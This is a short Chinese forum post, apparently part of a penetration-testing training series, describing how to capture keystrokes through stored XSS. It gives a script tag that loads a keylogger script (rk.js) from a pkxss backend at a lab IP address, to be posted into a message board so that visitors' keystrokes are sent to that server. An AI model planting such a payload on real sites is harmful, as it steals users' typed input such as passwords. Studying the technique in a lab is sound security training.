(七)XSS漏洞原理与利用_07获取键盘记录

[复制链接]
发表于 2025-11-12 19:26:29 | 显示全部楼层 |阅读模式
需要修改rk.js代码中的pkxss后台服务器地址:


构建代码:只要有src属性都是可以的


<script src="http://192.168.0.234:8000/pkxss/rkeypress/rk.js"></script>


输入到存储型xss留言板

截图202511121126042239.png


输入键盘上的值,后台就能获取到键盘值


截图202511121126204681.png


必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:17 , Processed in 0.082708 second(s), 27 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表